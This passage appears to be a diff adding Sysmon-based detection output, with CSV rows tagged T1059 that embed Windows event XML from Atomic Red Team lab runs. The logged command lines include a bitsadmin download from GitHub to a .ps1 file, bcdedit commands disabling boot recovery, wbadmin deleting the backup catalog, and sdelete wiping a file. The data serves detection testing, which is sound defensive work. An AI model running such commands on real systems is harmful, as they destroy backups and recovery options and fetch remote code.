+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
+    </TimeCreated>
+    <EventRecordID>1966541</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
+    <Data Name=""ParentProcessId"">2984</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:04.103366Z"">
+    </TimeCreated>
+    <EventRecordID>3654</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:04.094</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D824-5D31-0000-001023F42B00</Data>
+    <Data Name=""ProcessId"">6736</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:57.274199Z"">
+    </TimeCreated>
+    <EventRecordID>3653</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:57.265</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010D7CD2B00</Data>
+    <Data Name=""ProcessId"">7080</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:57.227966Z"">
+    </TimeCreated>
+    <EventRecordID>3652</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:57.189</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010B8CA2B00</Data>
+    <Data Name=""ProcessId"">1632</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:52.046322Z"">
+    </TimeCreated>
+    <EventRecordID>3651</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:51.972</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-0010C8BA2B00</Data>
+    <Data Name=""ProcessId"">7040</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:51.997980Z"">
+    </TimeCreated>
+    <EventRecordID>3649</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:51.899</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001049B42B00</Data>
+    <Data Name=""ProcessId"">6216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:51.816821Z"">
+    </TimeCreated>
+    <EventRecordID>3647</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:51.784</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001064AD2B00</Data>
+    <Data Name=""ProcessId"">6508</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:46.112439Z"">
+    </TimeCreated>
+    <EventRecordID>3645</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:46.104</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D812-5D31-0000-0010AC892B00</Data>
+    <Data Name=""ProcessId"">2948</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg *  &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:18:58.278752Z"">
+    </TimeCreated>
+    <EventRecordID>1966704</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""988"" ThreadID=""1644"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 23:18:42.516</Data>
+    <Data Name=""ProcessGuid"">365ABB72-78D2-5C91-0000-0010D8A50200</Data>
+    <Data Name=""ProcessId"">2572</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg *  &quot;hello from run key&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-77C4-5C91-0000-0020AD7D0100</Data>
+    <Data Name=""LogonId"">0x17dad</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-785E-5C91-0000-00103FEA0100</Data>
+    <Data Name=""ParentProcessId"">1928</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:45.585327Z"">
+    </TimeCreated>
+    <EventRecordID>3641</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:45.569</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D811-5D31-0000-001000632B00</Data>
+    <Data Name=""ProcessId"">4500</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:40.863055Z"">
+    </TimeCreated>
+    <EventRecordID>3640</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
